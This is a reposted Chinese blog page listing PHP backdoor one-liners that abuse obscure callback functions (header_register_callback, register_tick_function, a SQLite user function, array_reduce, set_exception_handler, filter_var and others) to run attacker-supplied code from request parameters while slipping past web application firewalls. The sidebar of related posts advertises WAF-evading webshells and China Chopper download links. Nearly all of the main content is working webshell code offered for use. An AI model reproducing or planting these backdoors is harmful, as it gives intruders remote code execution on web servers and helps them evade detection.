PHP后门之冷门回调函数(过waf)

最新推荐文章于 2021-03-28 05:04:44 发布
最新推荐文章于 2021-03-28 05:04:44 发布
阅读量264 收藏
点赞数
文章标签: php 数据库
原文链接:http://www.cnblogs.com/-qing-/p/10821238.html
版权 
header_register_callback(create_function('','return assert($_POST[\'k\']);'));

 

$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);`

 

数据库回调后门

$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
$e = $_REQUEST['e'];

 

register_shutdown_function($e, $_REQUEST['pass']);

 

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);

 

array_reduce(array($_POST['k']),create_function('$a,$b','return assert($b);'));

 

set_exception_handler(create_function('','return assert($_GET[k]);'));
throw new exception();

 

class a
{
  public function __construct($args)
  {
    forward_static_call('assert',$args);
  }
}
new a($_POST[k]);

 

iterator_apply(new arrayiterator(array($_GET['k'])),create_function('Iterator $i','assert($i->current());'),array(new arrayiterator(array($_GET['k']))));
array_intersect_ukey(array($_GET['k']=>'1'),array($_GET['k']=>'1'),'assert');
array_uintersect_uassoc(array($_GET[k]),array(''),'assert','strstr');
array_intersect_uassoc(array($_POST['k']=>''),array(''),'assert');
filter_var("phpinfo();" ,1024, array("options" => "assert"));

 

转载于:https://www.cnblogs.com/-qing-/p/10821238.html

王爷的大房子
关注
php回调后门,phpWAF一句话,php最新一句话,php过狗一句话.
SetToken的博客
03-21 7771
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567 http://pan.baidu.com/s/1jHoJxHW China chopper http://pan.baidu.com/s/1eRxEYjC 分享一下,一些不需要动态函数、
PHP常见过waf webshell以及最简单的检测方法
01-20
之前在Webshell查杀的新思路中留了一个坑 ,当时没有找到具体找到全部变量的方法,后来通过学习找到了个打印全部量的方法,并再次学习了下PHP webshell绕过WAF的方法,以此来验证下此方法是否合理。 如有错误,还请...
冷门PHP函数汇总
weixin_34146410的博客
07-06 119
概述 整理一些日常生活中基本用不到的PHP函数,也可以说在框架内基本都内置了,无需我们去自行使用的函数。量不多。后续在日常开发中如遇到更多的冷门,会更新本文章 sys_getloadavg 获取系统的负载 <?php $load = sys_getloadavg(); if ($load[0] > 80) { head...
使用php代码加亮函数构造php后门
heiyeluren的blog(黑夜路人的开源世界)
03-06 2661
使用php代码加亮函数构造php后门* 作者: heiyeluren* 时间: 2006-03-05* 博客: http://blog.csdn.net/heiyeshuwu[  后门构造 ]我们知道php非常强大,并且有很多有趣的功能,比如它就自带了一个php代码加亮的函数,叫做:highlight_string,它的参数就是一个字符串,如果这个字符串中包含了PHP代码,那么它
PHP的回调后门
feng的博客
10-17 997
前言 今天洪学长给我留个了任务,具体的就是关于回调后门这块的内容。我关于回调后门了解的很少很少,以前做南邮的题目遇到过一道三参数回调后门的题目,当时草草了解了一下,理解的不算很深。因此今天去学习了一下回调后门的相关内容。 PHP回调函数 什么是回调函数? 所谓的回调函数,就是指调用函数时并不是向函数中传递一个标准的变量作为参数,而是将另一个函数作为参数传递到调用的函数中,这个作为参数的函数就是回调函数。通俗的来说,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用的,这个函
php冷门函数之——call_user_func_array,func_get_args,func_num_args
小一的专栏
09-13 2768
昨天帮同学研究php对mysql进行封装操作的时候,无意中看到了call_user_func_array这个函数,好歹我php也用了一年多了,竟然还有这么多我不知道的功能函数,因此我们的原则是宁肯多学,不能放过,下面我会举几个例子给大家介绍一下这几个冷门php函数。话不多说,gogogogo     第一个函数,func_num_args,我们先来看一下php的manual对这个函数的解释
php大马过waf
04-28
php大马过waf,,......................................................................................................
php 绕过 stripos,PHP的两个特性导致waf绕过注入(有趣的知识点)
weixin_29692851的博客
03-28 1660
1、HPP HTTP参数污染HTTP参数污染指的是,在URL中提交相同键值的两个参数时,服务器端一般会进行一些处理。比如Apache就要以最后一个参数为准,比如:user.php?id=111&id=222如果输出$_GET数组,则id的值只会取222,即URL上提交的多余值覆盖了前一个值。2、一个CTF题目关于注入的waf绕过,注入点为:Default$sql="select * fro...
php-waf合集
12-24
压缩包内包含php版本的waf,支持过滤非法字符及文件等功能
PHP Shell (SPS-3.0)后门提权
08-18
2013年最好用的php提权大马。好多教程里的提权工具
超强php提权大马!过免杀代码
06-14
超强php提权大马!过免杀 代码
php回调后门,PHP 回调后门笔记
weixin_39997037的博客
03-28 90
php中 存在回调函数参数的函数,都有可能作为后门比如array_map , array_filter 这类数组操作的回调函数,但是在安全狗下会被杀掉但是uasort 这类函数不会被杀掉。php5.4.8之后的assert在5.4.8之后,assert函数由一个参数,变成了两个参数。增加了一个可选参数descrition:5.4.8增加了参数 description。 description 现...
php冷门但是很实用的函数
weixin_34257076的博客
03-31 76
debug_backtrace debug_print_backtrace headers_sent register_shutdown_function parse_url parse_str token_get_all basename array_change_key_case class_exists set_error_handler set_exception_h...
php 冷门与常用函数
临曦暮雨的小屋
07-27 644
数组 1 . array_diff比较数组的差集 (判断请求参数是否缺少,在已设定的数组里) $request = [ 'name'=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;'xiaoming', 'age'=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;'18', 'gender'=&amp;amp;amp;amp;amp;amp;amp;am
php后门木马常用的函数
qq_42572322的博客
08-15 4427
php后门木马常用的函数大致上可分为四种类型:   1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open   2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13   3. 文件...
php后门--异或
weixin_34253126的博客
05-09 211
看这个:<?php echo "A"^"}";?> 运行这段代码,那么输出的结果是字符"<",之所以会得到这样的结果,是因为代码中对字符"A"和字符"}"进行了异或操作。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。异或操作有时也被用来交换两个变量的值。 我们都知道,PHP...
PHP回调函数的实现方法
markely的专栏
04-14 3874
全局回调函数:     这里的全局函数的意思,是直接使用function定义的函数,它不包含在任何对象或类之中。请看下面的例子。 示例代码: function fnCallBack( $msg1 , $msg2 ) { echo 'msg1:'.$msg1; echo "n"; echo 'msg2:'.$msg2; } $fnName = "fnCallBa
WAF绕过技术:冷门函数与策略规避详解
WAF规则策略阶段的绕过总结中,提到了多种技术,包括字母大小写转换、编码转换、利用数据库特殊语法、请求方式差异、URL伪静态、白字符(如空格、换行等)的利用,以及冷门函数。 在具体编码绕过示例中,列举了URL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值